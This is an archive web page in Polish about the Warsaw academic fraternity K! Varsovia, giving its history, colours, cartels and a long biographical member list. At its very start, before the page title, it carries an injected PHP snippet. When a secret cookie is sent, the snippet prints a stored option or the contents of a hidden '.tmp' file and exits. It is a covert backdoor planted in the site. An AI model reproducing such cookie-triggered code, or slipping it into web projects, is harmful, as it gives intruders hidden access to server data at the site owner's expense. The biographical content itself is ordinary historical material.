if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Varsovia

Dekiel Bolesława Czempińskiego (?). Nazwa:
Polska Korporacja Akademicka Varsovia
Siedziba:
Warszawa
Data powstania:
18 I 1922 r.
Barwy:
ciemnokrwista – złota – seledynowa (symbolika barw: krew za Ojczyznę, szlachectwo serc, wytrwały trud nadzieją uwieńczony)
Dewiza:
„Virtute et assiduitate”, („Mężnie i wytrwale”)

Rys historyczny

Banda komersowa Stefana Grabowskiego i banda rycerska z herbem Varsovii Leona Ter-Oganjana.

Varsovia została założona 18 I 1922 r. Dnia 2 IV 1922 r. została członkiem Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 30 I 1922 r.). Kandydowała pod opieką K! Jagiellonia. Prawa członka rzeczywistego uzyskała 9 IV 1923 r.

W semestrze letnim roku akademickiego 1929/31 Varsovia przewodniczyła Warszawskiemu Kołu Międzykorporacyjnemu. Koło Filistrów powołano 18 I 1930 r. (?). W tym okresie powstało (istniało już ?) także Koło Pań. W 1927 r. pod opieką Varsovii kandydowała w Związku K! Nationalitas.

Komers rocznicowy Varsovii, Warszawa styczeń 1931 r.

Varsovia zawarła kartele dnia 30 maja 1926 r. z K! Coronia z Warszawy (V-letni) oraz w 1934 r. z K! Silesia z Poznania.

Knajpa piwna, kwatera Varsovii, Warszawa.

Całkowita ustalona, choć niekompletna imienna lista członków obejmuje 115 nazwisk, w tym czterech członków honorowych. W 1938 r. do Varsovii należało 85 (86 ?) osób, w tym dwóch (trzech ?) członków honorowych.

O działalności Varsovii, a także o spotkaniach jej członków w czasie wojny i w okresie powojennym zachowało się niewiele danych. Wiadomo, że w latach 80-tych i w początkach lat 90-tych odbywały się spotkania rocznicowe członków korporacji.

Lista członków

Poniższa, niekompletna lista członków Varsovii obejmuje ponad sto nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Antoni Byszewski, (9 lipca 1876 w Szewcach Dolnych - 23 października 1963 we Włocławku) herbu Jastrzębiec, s. Józefa i Teodory z Piaszczyńskich, wuj Włodzimierza Strzeszewskiego (Varsovia), absolwent studiów agronomicznych 1901, osiadł na Kujawach w swoim maj. rodzinnym, nauczyciel i kierownik Niższej Szkoły Ogrodniczej i Rolniczej w Pszczelinie 1902-04, nauczyciel w Szkole Rontalera w Warszawie 1904/05, od 1906 wykładowca we Włocławskiej Szkole Handlowej (obecnie Liceum Ziemi Kujawskiej), we własnym maj. w Szczytnie prowadził nowoczesne gospodarstwo rolne opierając się na najnowszych osiągnięciach agronomii i ekonomiki, w 1922 inicjator założenia Spółdzielni Handlowo-Rolniczej oraz Kasy Pożyczkowo-Oszczędnościowej w Czerniewicach , organizator i współzałożyciel Spółdzielni „Przetwórnia Mięsna – Bekoniarnia” w Czerniewicach, uruchomił we własnym maj. w Borzymiu mączkarnię spółdzielczą, współtworzył Polskie Towarzystwo Krajoznawcze Oddział we Włocławku 1908 (prezes 1908-25), jeden z inicjatorów powołania Muzeum Kujawskiego we Włocławku, Filister honorowy Varsovii, po II wojnie światowej kierownik stacji doświadczalnej w Jarantowicach, prowadził specjalistyczne kursy dla inspektorów plantacji w cukrowni w Brześciu Kujawskim, współorganizator Polskiego Towarzystwa Archeologicznego we Włocławku 1955 i Polskiego Towarzystwa Historycznego, Oddział we Włocławku 1956

  [Źródła (poza wskazanymi poniżej spisu członków): relacja Michała Raczkowskiego]

 2. Jan Dmochowski, (1877 - 2 listopada 1928 w Warszawie) ekonomista, prof. i rektor (1928) Wyższej Szkoły Handlowej, Filister honorowy Varsovii
 3. Jan Sosnowski, (26 stycznia 1876 - 24 czerwca 1938) wykładowca fizjologii zwierząt na Wydziale Rolniczym Wyższej Szkoły Rolniczej 1916-1918, od 1918 prof. zoologii i fizjologii zwierząt w SGGW, rektor SGGW 1923-25 oraz 1932-33, badacz zagadnień z zakresu przemiany materii, fizjologii mięśni i nerwów, współzałożyciel Towarzystwa Naukowego Warszawskiego, Filister honorowy Varsovii i Coronii
 4. Wacław Żenczykowski, (26 listopada 1897 w Kielcach - 18 lutego 1957 w Zurychu) inżynier, członek Polskiej Akademii Nauk, profesor Politechniki Warszawskiej, w latach 1925-39 zaprojektował ponad 40 dużych budynków, kurator i członek honorowy Varsovii.

Członkowie rzeczywiści

 1. Ignacy Bielawski, założyciel, akt. 1922-25, ps. “Ogier”, prezes 1925/26, Magister Varsoviae
 2. Mieczysław Bożedaj, ( - 1990) c. 1939, ps. “Boże jajko”

  Wiesław Brewiński.

 3. Wiesław Brewiński, (5 lipca 1916 w Warszawie - 26 grudnia 1994 w Elbląg) s. Ottona (lekarza dentysty) i Janiny ze Zdziarskich, absolwent Gimnazjum Humanistycznego im. Mikołaja Reja w Warszawie 1934, student i absolwent Akademii Stomatologicznej w Warszawie 1934-38, członek Bratniej Pomocy Studentów Akademii Stomatologicznej, członek zarządu i wiceprezes 1936-38, c. 1934, ps. “Ząbek”, akt. 1934-38, od 1938 barwiarz, sekretarz WKM sem. let. 1937/38, przeszkolenie wojskowe w Szkole Podchorążych Rezerwy w Warszawie 1938/39, którą ukończył jako kapral podchorąży, pracował jako lekarz-dentysta w I Szpitalu Okręgowym im. Marszałka Józefa Piłsudskiego w Warszawie, z którym został ewakuowany we wrześniu 1939, dostał się do niewoli sowieckiej, z której uciekł, po powrocie do Warszawy pracował w dotychczasowym szpitalu przemianowanym na szpital PCK dla rannych żołnierzy i ich rodzin, a po jego rozwiązaniu przez Niemców do wybuchu powstania warszawskiego w Ubezpieczalni Społecznej w Warszawie, w październiku 1944 wraz z ludnością cywilną wywieziony do Częstochowy, po wyzwoleniu wrócił do Warszawy, później przeniósł się do Rypina, gdzie pracował jako kierownik Przychodni Stomatologicznej w Ośrodku Zdrowa, pracował także jako dentysta w szkole, w 1950 powołany do LWP, przeniesiony do pracy w III Szkole Podchorążych Piechoty w Elblągu, gdzie pracował do 1957, ukończył Oficerską Szkołę Piechoty 1953, kapitan 1954, w 1957 przeniesiony do rezerwy, później dentysta w Społecznej Służbie Zdrowia, a następnie kierownik przychodni stomatologicznej i inspektor stomatologii dla miasta Elbląg i ówczesnego powiatu elbląskiego, od 1979 na emeryturze i pracował na pół etatu w przychodni stomatologicznej przy Zamechu II w Elblągu, major 1977,członek ZBOWiD, odznaczony Medalem Siły Zbrojne w Służbie Ojczyzny 1956, Złotym Krzyżem Zasługi, Srebrną Odznaką zasłużonego działacza LOK 1978, pochowany na Cmentarzu Dębica w Elblągu

  Zdzisław Brodnicki, ok. 1922 r.

 4. Zdzisław Brodnicki, (10 czerwca 1902 w Lipnie w Łucku - 16 stycznia 1942 w Tatiszczewie w rejonie Saratowskim w ZSRR) s. Urbana Józefa i Zofii z Grocholskich, szwagier Ryszarda Zieglera (Respublica), uczeń Gimnazjum Polskiego i Szkoły Realnej w Winnicy 1917-19, uczeń i absolwent męskiego Gimnazjum Kazimierza Kulwiecia w Warszawie 1919-22, od 1918 członek POW w Winnicy, ochotnik w wojnie polsko-rosyjskiej 1920, ppor. rez. 1930, por. rez. 1936, student i absolwentem Wydziału Leśnego SGGW, założyciel Varsovii, akt. 1922-32, ps. “Rozstrzelany”, olderman 1927, 1928, 1931, od 1938 filister, po studiach pracował w Instytucie Badawczym Leśnictwa w Warszawie oraz adiunkt w Naleśnictwie Państwowym w Łodobnie, w wojnie obronnej 1939 porucznik, internowany na Litwie, pochowany na cmentarzu polskim w Tatiszczewie (CP, II, 28 a)

 5. Wiktor Brückner, ( - 1932) założyciel, akt. 1922-26, wiceprezes 1925/26, prezes 1926, od 1928 filister, wiceprezes Związku Filistrów 1930
 6. Jan Bryling, (1909-1939) student PW, akt. 1929-32, ps. “Śmirus”, od 1931 barwiarz, pchor. rez. WP, zmobilizowany w 1939, zginął w kampanii wrześniowej na granicy Prus Wschodnich (?)
 7. Antoni Bukowiecki, (1909 - 13 września 1975 w Zurychu) student PW, akt. 1929-32, ps. “Mefisto”, od 1930 barwiarz, sekretarz sem. zim. 1931/32, wiceprezes 1932, od. 1938 filister
 8. Leopold Bukowiecki, (1908 - 18 czerwca 1976) student PW, akt. 1929-32, ps. “Puff”, od 1930 barwiarz, wiceprezes 1932/33, od 1934 filister, prezes Związku Filistrów 1935

  Władysław Byszewski, lata 30-te.

 9. Władysław Byszewski, (15 września 1915 w Błagowieszczeńsku - 3 kwietnia 1979 w Warszawie) s. Witolda herbu Jastrzębiec (prof. WSH) i Heleny z Gostkiewiczów, absolwent Gimnazjum im. Mikołaja Reja, student i absolwent Wydziału Rolniczego SGGW 1934-38 (mgr inż. 1939), c. 1932, ps. “Pu-Yi”, w czasie studiów asystent w Związku Producentów Ziemniaka, od lutego 1939 do wojny asystent Działu Uprawy i Hodowli Roślin Okopowych w Państwowym Instytucie Gospodarstwa Wiejskiego w Puławach, od listopada 1939 do końca 1940 w Zakładzie Hodowli Roślin w Bielanach k. Grójca, w 1941 asystent Zakładu Roślin Okopowych w Państwowym Instytucie Gospodarstwa Wiejskiego w Puławach, w czasie okupacji Szef Obszaru Wschodniego, Szef Komisariatu do spraw Cywilnych obszaru wschodniego NSZ, potem AK, aresztowany we wrześniu 1945 przez NKWD, podczas okupacji posługiwał się też nazwiskiem Władysław Zakrzewski, w 1942 asystent Firmy Hodowlanej „K.Buszczyński i S-wie”, następnie kierownik stacji hodowlanych (Górka Narodowa pod Krakowem, Motycz k/Lublina, Wierzenica pod Poznaniem, Więcławice pod Inowrocławiem), doktorat w 1950 na Wydziale Rolniczym Uniwersytetu im. M. Curie-Skłodowskiej w Lublinie, od 1953 kierował pracami w Centrali Hodowli Roślin Buszczyńskich, w 1957 został kierownikiem Zakładu Ekologii w IHAR-ze, od 1958 zatrudniony w SGGW, gdzie pracował aż do śmierci, najpierw jako adiunkt w Katedrze Szczegółowej Uprawy Roślin, od 1963 kierownik Zakładu Roślin Przemysłowych, a następnie był prodziekanem Wydziału Rolniczego, zastępca, a następnie dyrektor międzywydziałowego Instytutu Genetyki i Hodowli Roślin SGGW i jednocześnie kierownik Zakładu Nasiennictwa Instytutu Produkcji Roślinnej, w 1960 habilitacja na Wydziale Rolniczym SGGW, w 1969 uzyskał tytuł profesora nadzwyczajnego w Katedrze Szczegółowej Uprawy Roślin na Wydziale Rolniczym, tytuł profesora zwyczajnego 1978, wykładał na UW, pracownik PAN, członek wielu towarzystw i rad naukowych w kraju i za granicą, sekretarz naukowy w Komitecie Hodowli i Uprawy Roślin V Wydziału Polskiej Akademii Nauk oraz Komitetu Hodowli i Uprawy Roślin PAN, prace w Komitecie „Człowiek i Środowisko”, działającego przy Prezydium PAN, członek Rady Głównej NOT, działacz SITR, członek Rady Naukowej Instytutu Przemysłu Cukrowniczego, przewodniczący Prezydium Rady Hodowlano – Nasiennej przy Zjednoczeniu Nasiennictwa Rolniczego i Ogrodniczego oraz członek Zarządu Sekcji Hodowli Roślin i Nasiennictwa, członek Prezydium Międzynarodowego Centrum Kooperacji w Rolnictwie, członek Międzynarodowego Instytutu Buraka Cukrowego w Brukseli, odznaczony Srebrnym Krzyżem Zasługi, Krzyżem Kawalerskim Orderu Odrodzenia Polski, Krzyżem Komandorskim OOP, Srebrną i Złotą Odznaką Honorową NOT, nagrodą II stopnia Ministra Nauki, Szkolnictwa Wyższego i Techniki, pochowany na Starych Powązkach w grobie rodzinnym (T 72 – 1 – 7) [Źródła (poza wskazanymi poniżej spisu członków): relacja syna Janusza Byszewskiego]

 10. Bolesław Chłopicki, student WSH, akt. 1927-30

  Józef Chłopicki, 1925 r.

 11. Józef Chłopicki, ( - 1936) student SGGW, ps. “Mała Kula”, c. 1924, prezes 1925, Prezes Zwiazku Filistrów 1930, skarbnik ZPKA 1924-25 (III kadencja)

 12. Mirosław Czarnomski, (7 marca 1917 - 17 listopada 1995 w Katowicach) student WSH, ps. “Blotka Pik”, c. 1938, magister ekonomii

  Bolesław Czempiński, Warszawa 1929/30.

 13. Bolesław Czempiński, (2 luty 1906 w Odessie - 10 grudnia 2000) student PW, student UW (1927/28), c. 1926, ps. “Młody Lord”, akt. 1926-32, od 1928 barwiarz, wiceprezes 1929/30, absolwent UW, doktor nauk geograficznych, wieloletni pracownik Instytutu Geodezji i Kartografii

 14. Jerzy Czempiński, ( - 1978) student UW, założyciel, ps. “Lord”, akt. 1922-28, sekretarz 1924, I statystyk ZPKA 1925 (IV kadencja)
 15. Mieczysław Daszyński, c. 1927
 16. Michał Dutkiewicz, (1905 - 19 maja 1973) student WSH 1927-31, c. 1927, akt. 1927-32, ps. “Manu małpa”, od 1929 barwiarz
 17. Tadeusz Fabjanowski (Fabianowski), student UW 1927-31, c. 1927, barwiarz 1927/28, akt. 1927-31, ps. “Metr”
 18. Józef Flakowicz, (1909 - 2 lutego 1995 w Gliwicach) student PW, c. 1931, ps. “Rasputin”, akt. 1931-32, doktor nauk technicznych, profesor zwyczajny Politechnika Śląska
 19. Adam Frąckiewicz, c. 1934
 20. Wacław Gadomski, ( - 1977) akt. 1925-28, barwiarz 1927/28, ps. “Wrona”, sekretarz Związku Filistrów 1930
 21. Stanisław Garbiński, (30 maja 1913 - 30 maja 1963) student WSH, c. 1931, ps. “Dziubdziuś”

  Stefan Grabowski, Radom 2000 r.

 22. Stefan Grabowski, (31 sierpnia 1906 - 29 stycznia 2005) z rodziny ziemiańskiej, ukończył Gimnazjum w Piotrkowie Trybunalskim, student Wydziału Inżynierii Wodnej PW, c. 1927, barwiarz 1927/28, akt. 1927-32, prezes 1929/30, olderman 1930/31, Magister Varsoviae, magister inżynier hydrotechnik, po wojnie pracował m.in. przy budowie zapór w Rożnowie, Myczkowcach i Solinie, pochowany na Cmentarzu na Powązkach w Warszawie

 23. Stanisław Grodecki, ( - 1950) student PW, akt. 1932, ps. “Spodek”
 24. Tadeusz Grodecki, (10 lipca 1911 - ) student UW, Wyższa Szkoła Dziennikarstwa, c. 1930, ps. “Sardynka”, akt. 1930-32, od 1931 barwiarz, dziennikarz
 25. Roman Grzenda (Grzęda), student PW, akt. 1932
 26. Aleksander Gutowski, student WSH, c. 1927, ps. “Kuropatwa”, akt. 1927-32, od 1928 barwiarz
 27. Szczepan Hajek, c. 1933, ps. “Puchatek”
 28. Stanisław Hartman, (1903-1963) student PW, akt. 1932, ps. (”Murzyn-Turek-ben-Sali-Baba”)
 29. Ludwik Heinrich, (1909 - 13 listopada 1986) student PW, c. 1929, ps. “Gliniarz”, akt. 1929-32, od 1931 barwiarz
 30. Józef Helwich, ( - 1979) student PW, student UW (1929), c. 1928, ps. “Mała Kufa”, akt. 1928-32, skarbnik WKM-u w semestrze letnim 1929/30
 31. Kazimierz Helwich, ( - 27 grudnia 1981) student SGGW, założcyiel, ps. “Kufa”, akt. 1922-25
 32. Wacław Hochstim, student PW, c. 1930, akt. 1930-31, od 1931 barwiarz
 33. Alfred Imroth, “(1898 - 14 stycznia 1979) student PW 1924-29, założyciel, ps. “Tata”, akt. 1922-29
 34. Stefan Jastrzębski, student PW, c. 1938, ps. “Tłuczek”
 35. Zbigniew Jastrzębski, student PW, c. 1929, ps. “Rafałek”, akt. 1929-32, od 1931 barwiarz
 36. Jodko, ps. “Ramzes”
 37. Wacław Kaczyński, student SGGW, akt. 1925-28, ps. “Gąsior”, od 1927 barwiarz, wiceprezes 1927/28
 38. Kazimierz Kasperkiewicz, c. 1927
 39. Henryk Marjan Kern, student SGGW, c. 1927, ps. “Ziarnko”, akt. 1927-29, sekretarz 1927/28 i 1928/29
 40. Czesław Kilen, student UW, akt. 1925-32, ps. “Żłób”, barwiarz 1927/28
 41. Kazimierz Kłokocki, student UW, założyciel, ps. “Kakadu”, akt. 1922-28, prezes 1924
 42. Marjan Kobyliński, ( - 1989) założyciel, ps. “Łysy”, akt. 1922-25
 43. Kazimierz Kolbiński, ( - 10 września 1989) student PW, założyciel, ps. “Prorok”, akt. 1922-31
 44. Jerzy Kopczewski, student UW, student WSH (1932), c. 1929, akt. 1929-31, starszy kandydat 1931
 45. Lesław Roman Starża-Kopytyński, ( - 28 października 1976) student SGGW, c. 1928, ps. “Milord”, akt. 1928-31, od 1929 barwiarz, por. kawalerii, uczestnik wojny obronnej 1939, walczył we Francji, po wojnie na emigracji w Argentynie

  Aleksander Kowalczyk, 1938 r.

 46. Aleksander Kowalczyk, ( - 24 stycznia 1985) student WSH, c. 1934, ps. “Esjek”

 47. Wiesław Krantz, student WSH, c. 1933, ps. “Małpośledź”, od 1934 barwiarz
 48. Mieczysław Laszyński, student WSH, c. 1927
 49. Michał Lutkiewicz, student WSH 1927-31, c. 1927
 50. Jan Tadeusz Malewski, (9 sierpnia 1905 w Odrowąża k. Piotrkowa - 28 stycznia 1989) stryjeczny brat Konrada (Varsovia), student SGGW, ps. “Tutanhamon”, akt. 1925-28, wiceprezes 1928/29, żołnierz AK, autor wspomnień “Przeminęło” (Iskry, Warszawa 1989), w których fragment poświęcony jest Korporacji Varsovia (s. 70-76), pochowany w Niedospielinie k. Radomska

  Konrad Malewski, lata 50-te.

 51. Konrad Malewski, (3 lipca 1913 w Warszawie - 18 października 2010) s. Karola i Zofii z d. Sztukowska, brat stryjeczny Jana Tadeusza (Varsovia), absolwent oo. Salezjanów w Aleksandrowie Kujawskim, student i absolwent medycyny UW, c. 1934, ps. “Faraon”, absolwent Szkoły Podchorążych Sanitarnych w Waraszawie, oficer rez., uczestnik wojny obronnej 1939, w niewoli niemieckiej w oflagu II C Woldenberg 1939-45, po wojnie lekarz ginekalog-położnik w Łodzi i Pabianicach, członek Stowarzyszenia Filistrów Korporacji Akademickich w Poznaniu, odznaczony m.in. Medalem “Za udział w wojnie obronnej 1939″ oraz Medalem Zwycięstwa i Wolności 1945

 52. Zbigniew Markiewicz, student PW, student PL Lwów (1927), akt. 1925-32, ps. “Kokiet”, barwiarz 1927/28

  Bohdan Markuszewski, Warszawa 1929/30.

 53. Bohdan Markuszewski, student UW, c. 1927, ps. “Pająk”, akt. 1927-32, sekretarz 1929/30, od 1928 barwiarz

 54. Władysław Mazoń, student SGGW, c. 1929, ps. “Milimetr”, akt. 1929-32
 55. Stanisław Modzelewski, c. 1924, akt. 1924-25, olderman 1925/26
 56. Jan Morawski, ( - 1979) c. 1924, ps. “Gips”, akt. 1924-25, od 1925 barwiarz

  Prot Muśnicki, 1930 r.

 57. Prot Muśnicki, ( - ok. 195?), student UW, student WSH (1931), c. 1928, ps. “Knot”, akt. 1928-32, prezes 1930/31, olderman 1931/32, prezes WKM-u w semestrze letnim 1929/30, sekretarz zewnętrzny ZPKA 1929-30 (VIII kadencja), wiceprezes wewnętrzny ZPKA 1930-31 (X kadencja), redaktor “Wiadomości Korporacyjnych”

 58. Janusz Myszkiewicz, (1 maja 1902 - 26 grudnia 1981), brat Zbigniewa (Varsovia), student SGGW, c. 1931, “Speszony”, akt. 1931-32
 59. Jerzy Myszkiewicz, (1907 - 27 sierpnia 1929) student SGGW, c. 1927, akt. 1927-29
 60. Zbigniew Myszkiewicz, (23 września 1903 w Ostrołęce - 16 marca 1974 w Warszawie) brat Janusza (Varsovia), absolwent Gimnazjum Matematyczno-Przyrodnicze im. T. Nikielewskiego, student SGGW, inż. 1956, akt. 1925-32, ps. “Szpunt”, barwiarz 1927/28, w 1929 powołany do Szkoły Podchorążych, w wojnie obronnej 1939 powołany jako oficer do 3. Pułku Ułanów, od września 1939 w oflagu XVIIIa w Linzu, a następnie w Woldenbergu, inwalida wojenny, w 1941 wrócił do kraju, zamieszkał w Skórzewie pow. Grójec, gdzie pracował w syndykacie rolniczym, po wojnie z ramienia Ministerstwa Rolnictwa wizytował gospodarstwo rolne w Pracach Dużych w pow. grójeckim, w 1953 przeniósł się do Warszawy w zw. z pracą w PIHM, pochowany na Cmentarzu Powązkowskim
 61. Henryk Niedźwiecki, ( - 1939) student PW, c. 1929, akt. 1929-32, od 1930 barwiarz
 62. Tadeusz Niwiński, student PW, c. 1928, ps. “Nerpa”, akt. 1928-30, od 1929 barwiarz, wiceolderman 1929/30
 63. Marian Nobis, c. 1938, ps. “Cecyryl”
 64. Tadeusz Orbaczewski, student PW, c. 1929, akt. 1929
 65. Mieczysław Paszyński, c. 1927
 66. Tadeusz Piaszczyński, student WSH, akt. 1925-29, 1927/28 barwiarz [prawd. tożsamy z Tadeuszem Piaszczyńskim, absolwentem Gimnazjum Państwowego Ziemi Kujawskiej 1924]
 67. Stanisław Przegaliński, ( - 14 stycznia 1986) student PW, c. 1929, ps. “Minoga”, akt. 1929-31, od 1930 barwiarz, sekretarz 1930/31, I wiceprezes 1931/32, Sekretarz Związku Filistrów 1935, sekretarz WKM-u w semestrze letnim 1929/30
 68. Stanisław Przeorski, student PW, akt. 1925-30, ps. “Przeor”, barwiwarz 1927/28
 69. Jerzy Ptakowski, (1913-1982) c. 1932, ps. “Kurdupel”, od 1933 barwiarz, więzień obozu koncentracyjnego w Auschwitz, po wojnie na emigracji w Stanach Zjednoczonych, autor Auschwitz bez cenzury i bez legend” (Myśl Polska, Londyn 1985)
 70. Franciszek Puchaczewski, c. 1924
 71. Eugeniusz Janusz Rejment, (15 grudnia 1918 - 1966) student PW, c. 1938, ps. “Pyton”
 72. Wiesław Rejment, (29 październik 1910 - 5 października 1995 w Warszawie) student chemii UW, c. 1931, akt. 1931-33, od 1932 barwiarz, prezes 1933, magister chemik
 73. Zygmunt Reuth, ( - 23 grudnia 1991 w Wielkiej Brytanii) student PW, c. 1931, ps. “Postrzelony”, akt. 1931-32
 74. Ludomir (Lucjan Ludomir) Rogowski, student SGGW, akt. 1925-28, wiceprezes 1927
 75. Stanisław Różycki, (28 października 1903 - 14 stycznia 1991 w Melbourne) herbu Rola, s. Antoniego i Jadwigi z Niesiołowskich, student SGGW, akt. 1925-27, ps. “Miluś”, barwiarz 1927/28
 76. Wacław Sadowski, student PW, c. 1929, akt. 1929
 77. Tadeusz Salski, (17 październik 1910 - 16 październik 1981) student PW, c. 1929, ps. “Adonis Vernalis”, akt. 1929-32, od 1930 barwiarz, olderman 1932/33, prezes 1934, działacz młodzieżowy i narodowy, prezes Bratniej Pomocy PW, wysłannik władz Polski Podziemnej do Londynu do Rządu na Obczyźnie
 78. Zbigniew Salski, (1916 w Będzinie - 17 kwietnia 1944 w ok. Kraśnika) syn Zenona i Hanny z Napieralskich, absolwent Gimnazjum im. Staszica w Sosnowcu (matura 1934), student PW, c. 1934, członek Legii Akademickiej, żołnierz kampanii wrześniowej, później NSZ ps. “Jagiełło”, zginął w partyzantce walcząc z partyzantką sowiecką
 79. Ludwik Sawicki, (1910 - 8 grudnia 1974) student PW, AGH, c. 1930, ps. “Wymoczek”, akt. 1930-32
 80. Alfred Schroeter (Schroetter), (1906 - 1 grudnia 1971) student PW i WSH, c. 1927, ps. “Okularnik”, akt. 1927-32, wiceprezes sem. let. 1929, wiceprezes sem. let. i sem. zim. 1930/31, prezes sem. let. 1931, Magister Varsoviae, wieloletni prezes Koła Chemików UW
 81. Henryk Siedzieniewski, student PW, c. 1924, ps. “Śledź”, akt. 1925-32, od 1925 barwiarz, prezes 1927/28, 1928/29 i 1931/32, wiceprezes WKM-u w semestrze letnim 1929/30, Magister Varsoviae
 82. Armin Sims, c. 1938, ps. “Satyrek”
 83. Włodzimierz Sitkowski, c. 1927
 84. Stanisław Smogorzewski, c. 1935, ps. “Mendog”, od 1936 barwiarz
 85. Zdzisław Smogorzewski, c. 1938, ps. “Dziuptas”
 86. Stanisław Sommerfeld, student WSH, akt. 1932
 87. Stanisław Stachowicz, c. 1924, ps. “Kuba”, od 1938 filister
 88. Jerzy Stamirowski, akt. 1925, sekretarz 1925/26
 89. Władysław Staszkiewicz, akt. 1925
 90. Zdzisław Stępiński, ( - listopad 1979) student SGGW, c. 1924, ps. “Brelok”, akt. 1924-31, od 1925/26 barwiarz
 91. Aleksander Stokowski, akt. 1925
 92. Stefan Strzeszewski, ( - po 1945) s. Włodzimierza i Anieli Józefy z Byszewskich, siostrzeniec Antoniego Byszewskiego (Varsovia), brat Stefana (Varsovia), student PW, założyciel, ps. “Satyr”, akt. 1922-28, wiceprezes 1924, Magister Varsoviae, przedostał się do PSZ na Zachodzie, po wojnie na emigracji w Australii (według innych relacji zginął na froncie zachodnim) [Źródła (poza wskazanymi poniżej spisu członków): relacja Michała Raczkowskiego]
 93. Włodzimierz Strzeszewski, (30 czerwca 1903 w Kłóbce w pow. włocławskim - 6 czerwca 1969 w Warszawie) s. Włodzimierza i Anieli Józefy z Byszewskich, siostrzeniec Antoniego Byszewskiego (Varsovia), brat Stefana (Varsovia), absolwent Gimnazjum Realnego Edwarda Rontalera 1921, ochotnik w I Baonie Zapasowym Artylerii Konnej, student i absolwent Wydziału Mechanicznego PW (dyplom inż. na Oddziale Lotniczym 1930), c. 1924, ps. “Tog”, akt. 1925-30, olderman 1929/30, od 1930 konstruktor w Biurze Technicznym oraz na innych stanowiskach w Polskich Zakładach Skody na Okęciu (od 1935 przemianowanych na Państwowe Zakłady Lotnicze), od 1933 kierował tamże Sekcją Badań Wydziału Technicznego, skarbnik Związku Filistrów 1935, Magister Varsoviae, w czasie okupacji w konspiracji w Wydziale Przemysłu Lotniczego Pionu Przemysłu Wojennego Komendy Głównej AK, jako kapitan (?) uczestniczył w powstaniu warszawskim, 5 października 1944 wzięty w Warszawie do niewoli, osadzony w Stalagu 344 Lamsdorf, a następnie w Oflagu II D Groß Born, od 1945 wykładowca w Szkole Inżynieryjnej im. Wawelberga i Rotwanda, dyrektor techniczny Polskiego Komitetu Normalizacyjnego 1945-54, od marca 1954 kierownik sekcji w Centralnym Biurze Konstrukcyjnym Silników Spalinowych w Warszawie, od sierpnia w Zakładach Mechanicznych im. M. Nowotki w Warszawie, w tym od 1957 główny konstruktor w biurze konstrukcyjnym silników wysokoprężnych, od 1964 kierownik Branżowego Ośrodka Przemysłowych Silników Wysokoprężnych, od lutego 1968 do śmierci pracował w Ośrodku Silników Instytutu Lotnictwa w Warszawie, członek Stowarzyszenia Inżynierów i Techników Mechaników Polskich oraz Klubu Seniorów Lotnictwa Aeroklubu PRL, odznaczony m.in. Srebrnym Krzyżem Zasługi 1936 i Krzyżem Kawalerskim OOP, pochowany na warszawskich Powązkach (kw. 217, rz. 5, m. 16)

  [Źródła (poza wskazanymi poniżej spisu członków): relacja Michała Raczkowskiego]

  [Źródła (poza wskazanymi poniżej spisu członków): relacja Michała Raczkowskiego]

 94. Zbigniew Stypułkowski, student WSH, c. 1930, ps. “Pępek”, akt. 1930-32, od 1931 barwiarz
 95. Tadeusz Mieczysław Szefer, (31 marca 1914 w Dąbrowie pow. Frysztat na Śląsku Cieszyńskim - 1940 w Charkowie) s. Leopolda i Heleny z Tychowskich, absolwent Gimnazjum im. Rejtana 1931, student i absolwent ekonomii SGH, student prawa UJ, c. 1932, ps. “Befsztyk”, akt. 1932-1933, olderman 1934/37, prezes Akademickiego Koła Ekonomistów, działacz narodowy MW, OWP i ONR, ONR “ABC”, doktorant SGH, pracownik Referatu Morskiego Izby Przemysłowo-Handlowej w Gdyni, ppor. rez., przypisany do 8 Pułku Ułanów, w wojnie obronnej 1939 w Oddziale Zapasowym Krakowskiej Brygady Kawalerii, wzięty do niewoli sowieckiej 27 września pod Chmielnikiem, rozstrzelany przez NKWD w Charkowie
 96. Olgierd Śliwiński, ( - 7 grudnia 1979) student SGGW, c. 1924, akt. 1924-28, ps. “Karapet”,
 97. Piotr Tarkowski, student UW, student UP (1927/28), c. 1923, ps. “Marchew”, akt. 1923-31, sekretarz 1924, prezes 1927

  Leon Ter-Oganjan, Warszawa 1994 r.

 98. Leon Ter-Oganjan, (12 listopada 1910 w St. Petersburgu - 12 luty 2002 w Warszawie) pochodził z rodziny ormiańsko-rosyjskiej, absolwent Gimnazjum Rontalera w Warszawie 1929, student PW 1929/30, NYCC 1930/31, student WSH 1931-38, dyplomant WSH 1938, UW 1946-48, magister filologii angielskiej 1954 UW, c. 1929, ps. “Maharadża”, akt. 1929-34, olderman 1933/34, uczestnik kampanii wrześniowej 1939, w latach 1941-44 zesłany do GUŁAGU w okolicach półwyspu Kola, 1944 wcielony do Armii Sowieckiej, następnie w Wojsku Polskim, wykładowca lektoratów na UW i innych wyższych uczelniach, społecznik, działacz Towarzystwa Przyjaźni Polsko-Islandzkiej, Związku Filatelistów Polskich, Stowarzyszenia Ormian w Polsce, ZBOWiD, Związku Sybiraków, członek Zarządu 1993-95, skarbnik 1995-97, sekretarz 1997-99, skarbnik 1999-2001 Stowarzyszenia Filistrów Polskich Korporacji Akademickich, bene meritus Stowarzyszenia Filistrów Polskich Korporacji Akademickich, odznaczony Honorową Odznaką ZPKA 1999, wydawca, redaktor naczelny, współautor Biuletynu SFPKA “Polskie Korporacje Akademickie” (nr 1-16), jeden z najbardziej zasłużonych korporantów dla odrodzenia ruchu korporacyjnego po 1989 r.

 99. Jerzy Urbanowski, student SGGW, c. 1927, ps. “U”, akt. 1927-32, od 1928 barwiarz

  Jerzy Urbański, 1931/32 r.

 100. Jerzy Urbański, (1907 - 3 marca 1973) student PW 1927-31, student WSH 1931-38, c. 1928, akt. 1928-32, II wiceprezes 1931/32, prezes 1932/33, sekretarz zewnętrzny ZPKA 1931-32 (XI kadencja)

 101. Józef Wencel, student SGGW, c. 1924, ps. “Manu”, akt. 1924-29, od sem. let. 1924/25 barwiarz, sekretarz 1927
